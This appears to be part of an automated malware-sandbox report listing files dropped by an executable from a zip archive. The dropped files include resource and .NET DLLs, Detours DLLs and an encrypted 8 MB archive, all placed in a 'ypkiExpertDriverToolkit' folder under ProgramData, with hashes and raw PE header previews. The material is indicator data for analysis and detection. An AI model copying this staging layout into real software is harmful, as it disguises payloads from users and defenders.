                    SHA-512:441610D2B9F841D25494D7C82222D07E1D443B0DA07F0CF735C25EC82F6CCE99A3F3236872AEC38CC4DF779E615D22469666066CCEFED7FE75982EEFADA46396
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ksa...........!.................6... ...@....@.. ....................................@..................................6..K....@..............."..h$...`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................6......H.......D%..<...................P ......................................_...+.'g.......x2..}}...B.O....T...e..?.M..R"M.~pg..c..LD#..y.....y....:u.v*...#.;.-.h.......0..#.....a5|T%W...].!.%'..9.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                    C:\ProgramData\ypkiExpertDriverToolkit\System.Runtime.WindowsRuntime.UI.Xaml.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):73264
                    Entropy (8bit):6.30167033626095
                    Encrypted:false
                    SSDEEP:
                    MD5:64009EE659098AD443AB743DE3A86D13
                    SHA1:3B26B25E39412123D39A2B1BE07E36462C0512C8
                    SHA-256:9CF428C8F7D3262E3DEAA802584CAD9155D281BAB49B419C0D2DA33DD5E50DBB
                    SHA-512:B568F68A4CDE635BBB1AFDA1CD6E5E13E09C3B11F529D577E2248CEF3300E7D45531B423B60466FF73FE08E45B653CC3B7EEA87EB7233284DCC02BCE1C5489E7
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X>.].........." ..0.................. ........... ....................... ......":....`.................................8...O.......................0d..........x................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................l.......H.......(O..0y..........X... ...x........................................0..,...........(.........%.}S....%.}R....%.}Q....}P...*......(......}P.....}Q.....}R......}S...*....0...........#........2..(....,.r...p......%.rI..p.(....s....z.#........2..(....,.r...p......%.rY..p.(....s....z.#........2..(....,.r...p......%.rk..p.(....s....z.#........2..(....,.r...p......%.r...p.(....s....z*2.(....(....*...0..~........(M.....@s........{P....(....o....&..o....&...{Q....(....o....&..o..

                    C:\ProgramData\ypkiExpertDriverToolkit\System.Text.Encodings.Web.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):78976
                    Entropy (8bit):6.105061710610473
                    Encrypted:false
                    SSDEEP:
                    MD5:C77AE3414D78C1F082C65415FAE69661
                    SHA1:3B35461D86A774535AC226CA9706FB50332DE20A
                    SHA-256:C792BFE3F43C894E20339252D159A96A20CCC6E13322B2D382570FF97939E501
                    SHA-512:08941BA8BE5031CC4E363A916525437C62B409576C91C10FC72795FAA10BC989F0D1797B576802E208DFE4305A4447C0299E2755BA92F97F531DE1F56FD5865A
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u............" ..0.................. ... ....... .......................`......<.....`.....................................O.... ...................(...@..........T............................................ ............... ..H............text...0.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........m......................H.........................................('...*..('...*..('...*^.('......8...%...}....*:.('.....}....*:.('.....}....*:.('.....}....*^.('......9...%...}....*:.('.....}....*:.('.....}....*..0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X((.....R...((.....d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X().... ...._.S...().....d.S*..0..&.........+....(*...G...Z.(......X....(+...2.*...0............(+.....1...(+....Z.:..

                    C:\ProgramData\ypkiExpertDriverToolkit\System.Threading.Tasks.Extensions.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):25984
                    Entropy (8bit):6.291520154015514
                    Encrypted:false
                    SSDEEP:
                    MD5:E1E9D7D46E5CD9525C5927DC98D9ECC7
                    SHA1:2242627282F9E07E37B274EA36FAC2D3CD9C9110
                    SHA-256:4F81FFD0DC7204DB75AFC35EA4291769B07C440592F28894260EEA76626A23C6
                    SHA-512:DA7AB8C0100E7D074F0E680B28D241940733860DFBDC5B8C78428B76E807F27E44D1C5EC95EE80C0B5098E8C5D5DA4D48BCE86800164F9734A05035220C3FF11
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..8...........V... ...`....... ....................................@..................................V..O....`...............B...#..........PU............................................... ............... ..H............text....6... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H........0...$...................T........................................(....*..(....z..(....z2.(....s....*2.(....s....*:........o....*.~....*~.-..(......}......}......}....*~.-..(......}......}......}....*Z..}......}......}....*J.{....%-.&.*o....*^.u....,........(....*.*~.{.....{....3..{.....{......*.*&...(....*2...(.......*....0..'........{......,..u....%-.&..(...+(....*(....*n.{....,..(....s....*.q....*..0..a.........{....o0.....,;..{....o2...(......;...3.~.......s......

                    C:\ProgramData\ypkiExpertDriverToolkit\System.ValueTuple.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):25232
                    Entropy (8bit):6.672539084038871
                    Encrypted:false
                    SSDEEP:
                    MD5:23EE4302E85013A1EB4324C414D561D5
                    SHA1:D1664731719E85AAD7A2273685D77FEB0204EC98
                    SHA-256:E905D102585B22C6DF04F219AF5CBDBFA7BC165979E9788B62DF6DCC165E10F4
                    SHA-512:6B223CE7F580A40A8864A762E3D5CCCF1D34A554847787551E8A5D4D05D7F7A5F116F2DE8A1C793F327A64D23570228C6E3648A541DD52F93D58F8F243591E32
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.............b2... ...@....... ...............................H....@..................................2..O....@...............$...>...`......x1............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................B2......H........!..T....................0......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2r[..p.(....*B.....(.........*.BSJB............v4.0.30319......l...4...#~..........#Strings....t.......#US.@.......

                    C:\ProgramData\ypkiExpertDriverToolkit\TelephonyInteractiveUserRes.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.9968204924301447
                    Encrypted:false
                    SSDEEP:
                    MD5:F38298814F74EDFC482DD7ADD8C8FE2B
                    SHA1:17E4D57DBBB340E51239BB8A6929E4B369FB0DE3
                    SHA-256:151E709BD9C173124AA5B0E1915A447799D8CAD3ADFA3BF4379D2ADDD68DD2E2
                    SHA-512:533774B214DB5EA49166C7AF1BC87D0F3C475BCB591623CB9E2ACA81F2F3304A035B92A59259C769142CCEC17DD0DBC85585493937A84C17EE6FA869F24206E9
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....v4`.........." .........................................................0............`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....v4`........T...8...8........v4`........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... .......4.3...rD..=%D}.'.n_.K).v4`........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\TpmCertResources.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):3584
                    Entropy (8bit):2.80619626871049
                    Encrypted:false
                    SSDEEP:
                    MD5:63CB7DFB6CB827F6D21F6E6813EAC09F
                    SHA1:B359F47014A523F7EA9BE0DADB90708EF13399BE
                    SHA-256:6DE2A8E1E41E6F4DC8C80F270DC00E550DEDDA1FD50B23BF7767624D0DF73AA0
                    SHA-512:B3C3D0E6B1571DD4A5BFA0DD5FC12E3D7485D1A9F39FEA3B750446A4AC3339F68AB34F3031A55C4DE7EE4DF13513E6ED82FD27999A07816A70BEA798CB77EB1E
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...~s............" .........................................................0......_.....`A......................................................... ..@...............................T............................................................................rdata..............................@..@.rsrc...@.... ......................@..@....~s..........T...T...T.......~s..........$...............~s..............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01.....!.......rsrc$02.... .....qT.....k.R.T........"...8.~s..............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\XAudio2_8.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:modified
                    Size (bytes):3584
                    Entropy (8bit):2.899215532294367
                    Encrypted:false
                    SSDEEP:
                    MD5:930547A75D0C8AB9DB640B400B5EA2C3
                    SHA1:89A30569BC9AF0FFA27BBEEF29D0E4061DE17FA8
                    SHA-256:758DE3275E114DBBD834FBA0E56FFE84085579740398F8911D616F273534A5A5
                    SHA-512:7E29EAF4939DCA7C08BC7490DE3565BBABE01EC6D0E088A6BB3444A5AAD68F5FEC904D747F9A78768BDD826C05C583D8D5A8DD12F5823E1DABB94AF554311B80
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........................PE..d................." .........................................................0......,.....`A........................................`................ ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\advapi32res.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.875372747831474
                    Encrypted:false
                    SSDEEP:
                    MD5:56454BED3820DE989B4B7342DFBC8FED
                    SHA1:B9C224AF84996EDEB5C4697E92B58F9384206A6B
                    SHA-256:7588B9C5D6412A759CAD5670C97A3E702419BC7199CB0E28091D6773692A302B
                    SHA-512:00466928162FDC859EC1FB8179CFD2EE016EF1A367CF0D1324EAB55B73C48FDB246824941D3908A42789B744F1C37E0B8A414557198638002BAC707458709E42
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....M.].........." .........................................................0.......q....`.......................................................... ..0...............................8............................................................................rdata..............................@..@.rsrc...0.... ......................@..@.....M.]........T...8...8........M.]........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....:a~.....5.7..\.....3E....M.]........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\asferror.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.8320374066464757
                    Encrypted:false
                    SSDEEP:
                    MD5:095F83F3A59C1FE3F0FE09B83FCB61BB
                    SHA1:53150630AFD41A9F79A6C8AD283D26DA7901D502
                    SHA-256:F19AF37F7A6DF8BF1D1D75AD7207F2398FACF275230A158C0ED16431B7D95E09
                    SHA-512:7DCDB173F8F3E201ED5070F4802D44D70E580FD2CB60A9A74E8DE005B86AB3B3204E9A3221EBBE64892D02232AAB884FD5BBA89AF02CBC49F11FA77F4EF019C9
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....k.S.........." .........................................................0......g.....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....k.S........T...8...8........k.S........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..`....rsrc$02.... ...'2........<)..E...._.!n*".k.S........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\ati2erec.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):72088
                    Entropy (8bit):5.655242935760088
                    Encrypted:false
                    SSDEEP:
                    MD5:7008C26719C2881343BD2F6B43EC6708
                    SHA1:74325C4FDD516B59612B035CF8D0203BF913A2DD
                    SHA-256:F2DD6C89CD6B455666E9D7C88A6E577FA614D1DA2E0805F5243EF0B36D13D981
                    SHA-512:D64C5249911295D752C55EFA13F20953AAF74134A2D82D27F154E91AFBD71B222A011CCDF7735C227769336659E02B3721F63B8594DE9F852F02FDA18FA48B69
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............@.~.............@.......Rich............PE..L....R4b...........!................................................................].....@.......................................... ..................m..............8............................................................................rdata..............................@..@.rsrc....... ......................@..@.....R4b........l...P...P........R4b....................................................8....rdata..8........rdata$voltmd...P...p....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\atiacmLocalisation.ini

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:Unicode text, UTF-16, little-endian text
                    Category:dropped
                    Size (bytes):10622
                    Entropy (8bit):3.9477058009049566
                    Encrypted:false
                    SSDEEP:
                    MD5:CCA9867F688F1AFA54123C7E435B6FD7
                    SHA1:C0FEE5B50D4EBDD6F6A73C000FBC7399E3FF7622
                    SHA-256:2C14AF9585ED6AB0947D9FD7F205776B28EFC91286BB12BFD085AE5737CCDFAF
                    SHA-512:F190DF4C9A9C1FFC825724B32DF47A2965BFCAFA435A5A247320C83976AC310395857177357FD7D7B3C7F33F6E45C74BF7C0DF1AF1E8853A919D16698A58D0BB
                    Malicious:false
                    Reputation:low
                    Preview:..[.E.N.U.]...I.D.S._.A.T.I.A.C.E.=.A.M.D. .R.a.d.e.o.n. .S.o.f.t.w.a.r.e...I.D.S._.A.T.I.A.C.E._.C.C.C.P.R.O.=.A.M.D. .R.a.d.e.o.n. .P.r.o. .S.e.t.t.i.n.g.s...I.D.S._.A.T.I.A.C.E._.R.S.X.P.R.O.=.A.M.D. .R.a.d.e.o.n. .P.r.o. .S.o.f.t.w.a.r.e...I.D.S._.L.A.U.N.C.H._.C.C.C.S.L.I.M.=.A.M.D. .R.a.d.e.o.n. .A.d.d.i.t.i.o.n.a.l. .S.e.t.t.i.n.g.s...I.D.S._.L.A.U.N.C.H._.C.C.C.S.L.I.M._.W.S.=.A.M.D. .R.a.d.e.o.n. .P.r.o. .A.d.v.a.n.c.e.d. .S.e.t.t.i.n.g.s.....;.*.*.*.*. .E.n.g.l.i.s.h.....[.T.R.K.]...I.D.S._.A.T.I.A.C.E.=.R.a.d.e.o.n. .A.y.a.r.l.a.r.1...I.D.S._.A.T.I.A.C.E._.C.C.C.P.R.O.=.R.a.d.e.o.n. .P.r.o. .A.y.a.r.l.a.r.1...I.D.S._.A.T.I.A.C.E._.R.S.X.P.R.O.=.A.M.D. .R.a.d.e.o.n. .P.r.o. .Y.a.z.1.l.1.m.1...I.D.S._.L.A.U.N.C.H._.C.C.C.S.L.I.M.=.R.a.d.e.o.n. .E.k. .A.y.a.r.l.a.r.1...I.D.S._.L.A.U.N.C.H._.C.C.C.S.L.I.M._.W.S.=.R.a.d.e.o.n. .P.r.o. .G.e.l.i._.m.i._. .A.y.a.r.l.a.r.1.....;.*.*.*.*. .T.u.r.k.i.s.h. .(.T.u.r.k.e.y.).....[.T.H.A.]...I.D.S._.A.T.I.A.C.E.=...2.#...1.I.....H.2. .R.a.

                    C:\ProgramData\ypkiExpertDriverToolkit\blbres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.92520605088594
                    Encrypted:false
                    SSDEEP:
                    MD5:DF5A7A6D0383A49EB1A8F92A82B4320E
                    SHA1:11E09B10AC4AD4ED09C157114FEB33E250481032
                    SHA-256:5820801622420D26C8248335A78D76165204ECC3B644319F6A27D5D0EE8EF1BD
                    SHA-512:65F38A20205FF778FF3CD87E04312D7ED584657F7434391A04D6D6FD576CEBCE14FE448C3BBBA1497C15751004C6EB80023583FFF035CFC174A14660D45AB57B
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d................." .........................................................0......GX....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@................T...8...8...................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....<9>........b........|..............................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\bridgeres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.813961147558415
                    Encrypted:false
                    SSDEEP:
                    MD5:986A47DF3C85D3B92874B5B1EC02C72B
                    SHA1:C8399DF5F584A0BD1B805D4CBFAAA6851EE3D4CC
                    SHA-256:A432AAE81E3C7B6AD1CE9D33A98194015B1897868F00E84827409E7F427B5A5A
                    SHA-512:289CCF0B2E11F97064A4CE421D3D86247376214323FEF5E98A8B8FDE4D3A92BDC629352D857869A756DDCBC17894D3D6DB893A1AC36A42BEA174BAA08693C383
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....!..........." .........................................................0......g.....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....!.........T...8...8........!.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..`....rsrc$02.... ...1j. ..l.D7.L....zX.p..=;D...!.........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\comres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.966956288766309
                    Encrypted:false
                    SSDEEP:
                    MD5:594DC05001C49200B6617FC002B9D271
                    SHA1:93E7B081F7DEC0E6EA40EE7959C48FB9AD252084
                    SHA-256:B10ACD7AA94FFA1155816EBDAD9E11F0723B1676A214D9A02306B6F7141F1325
                    SHA-512:BB25A876B5E09FC079F3006EBE95973ED61A5A9430A15B185B7732D406C340C821E01198067997CC08F93A52F0227548A1BD57BD8F2A2662D484D172E78FB3F2
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....>.........." .........................................................0............`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@......>........T...8...8.........>........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....l.i7D.7..t!....\+.C..%R...>........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\defragres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):4096
                    Entropy (8bit):2.940668484650526
                    Encrypted:false
                    SSDEEP:
                    MD5:6B5922B81555C976480CB0EB82855EB6
                    SHA1:AC925E9690EF1BD3E6697F56776B8AD22EF5E71B
                    SHA-256:C8FF930A635AA0DE84499DC2697B66CABA699590AB4A56C00ED56730B0764230
                    SHA-512:73A337ED946D4172086D16323720C517311DE7B214764DF5D600B80B650CDD3643EA6592FF459122F730B37CC507B2A630B2FF413EC495EB7A230ABB06C3F488
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...!..O.........." .........................................................0............`A......................................................... ..................................T............................................................................rdata..............................@..@.rsrc........ ......................@..@....!..O........T...T...T.......!..O........$...............!..O............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01.....!.......rsrc$02.... ..../.."ci..N...QI..x.Q....6x..!..O............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\detoured32.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):30032
                    Entropy (8bit):7.1457708682557595
                    Encrypted:false
                    SSDEEP:
                    MD5:93DE1A418BB632A2950844F7058712F1
                    SHA1:7B3DB77F2D5401DA668F48B9EF3C7F047630AB9D
                    SHA-256:2DB72EBBC5C82BC92B45F225BC7CC47ED8FC80E24085DBFB233650EE72904A02
                    SHA-512:D0F4FB713EADD060389726E18A76D82EF3649BBFD0336074426C237FF344C1824AD100C4CB91BB90EC98375B647467143F76430FC4EE9CD044E3718E59BAF0A0
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E................]k.............$.A.....$.|.......{.....$.~.....Rich............PE..L...C..S...........!......................... ...............................`......q.....@.........................P ..H....!..(....@..\...............Pe...P....... ..8............................................ ...............................text...*........................... ..`.rdata..r.... ......................@..@.data........0......................@....rsrc...\....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\detoured64.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):30032
                    Entropy (8bit):7.12871547663608
                    Encrypted:false
                    SSDEEP:
                    MD5:20CAB1E42149F7ACF99102B966D5F0C3
                    SHA1:A46E599B1B09976877F80D4119B299F8FDD6850C
                    SHA-256:B4DE3A0DD789BCF62DB62A813FC80E1D5AC6EB40C37A475247641CF17FC4A498
                    SHA-512:445A6337564A24857FB1651C9453640598397ACE65C84EAB5B596246A5ED244FEEF5D61067BA3D9A696D0AB8107E3925283E1F16532E88D512BBB8637231D70B
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M0...Q..Q..Q.....Q..Q..Q......Q......Q......Q......Q.Rich.Q.........................PE..d......I.........." .........................................................`......b/............................................... ..H.... ..(....P..\....@..........Pe........................................................... ...............................text...(........................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@......................@..@.rsrc...\....P......................@..@........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\dmdskres.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.8849522136124652
                    Encrypted:false
                    SSDEEP:
                    MD5:ABD13543F3CA0D2D1BFDAFCF550A21BF
                    SHA1:239DFFCB4DBD60FD64C6F160CE167471B34C1C21
                    SHA-256:B38C7F6C1E3D4EB5B7D07DE0BA10528FD3455655EFE01101DEED8DE77B81FC99
                    SHA-512:61F4E932A8D82C840577A4F2597D46EAA84FE44BA5E9C4A4366CB93C1767C0B6AAE80657DDDFC6428F58DCF1853BECD0BE74CBFAAD85B04EA746E040B82D13E8
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....t..........." .........................................................0......d.....`.......................................................... ..H...............................8............................................................................rdata..............................@..@.rsrc...H.... ......................@..@......t.........T...8...8.........t.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....-o.^S...t....?..h....z./..!..t.........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\dmdskres2.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.8622807589125516
                    Encrypted:false
                    SSDEEP:
                    MD5:926A1C208563FDE04E0DE620DDCD416A
                    SHA1:4459A5C370FDEA9A0C01FF2912C14A9D006F14E3
                    SHA-256:EA9C8B84D5D1ED617B107BBFAE664C3FC32D33F6E5C8CD3AEEE7006CEA499AC1
                    SHA-512:FE29E86399A2DE8B13606E32B8E811599F790EE6B5C1CEAE4BB1233FE02C18BCF15D282B720BAA2A6F925E88062D690EA9D498B31949AA2DF17D9DBD87CE2DCA
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d................." .........................................................0............`.......................................................... ..0...............................8............................................................................rdata..............................@..@.rsrc...0.... ......................@..@................T...8...8...................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...{..Q.....<I..+N...p..R.V............................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\dxmasf.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):2.9921540728817355
                    Encrypted:false
                    SSDEEP:
                    MD5:9B5D7B7EBA994FFBC019C815A3D85B38
                    SHA1:3BFFE25B0AA726BDF5A09B46F184F548971D8D8B
                    SHA-256:A0E85D2949A7B51758575F98A89D871BE2E4503F6AE6C6297BE625A4909DCADB
                    SHA-512:E71D2AA130E215956B193D90926FB9A56532127BC2CD7E3DE19414378DDDB020B9D6BCB56918F061E32EAF3274FC755238E4E505929AB6C2E4FEE5CD091B84DC
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.Y...Y...Y...M...Z...Y...T...M...\...M...[...M...X...M...[...M...X...M...X...RichY...........PE..d...k.D..........." ................@........................................p............`A........................................ $.......$..(....P.......@..<............`.......!..p............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata..<....@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\gdf20bvc5n58fg052g0fh

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:WinHKI archive data
                    Category:dropped
                    Size (bytes):8232231
                    Entropy (8bit):7.998782919507245
                    Encrypted:true
                    SSDEEP:
                    MD5:A9239F6D1B91F9C64E531C3EFDDCECDE
                    SHA1:40072A9958A567B21E7B54B3DDE0AD969AE19BE0
                    SHA-256:C745555D4CF2EF8CB10AE0E2B7C32A3D652CA25BEA3EDAC0C41629B372438679
                    SHA-512:68D506FD7C0115C7309193E8C44505BC3836CD57E51D6B4296F66AAEA5FE9EECC4147A0A16895D8A39C0DF53E68CB801977CA70E98179E74B3923DD41D52812A
                    Malicious:false
                    Reputation:low
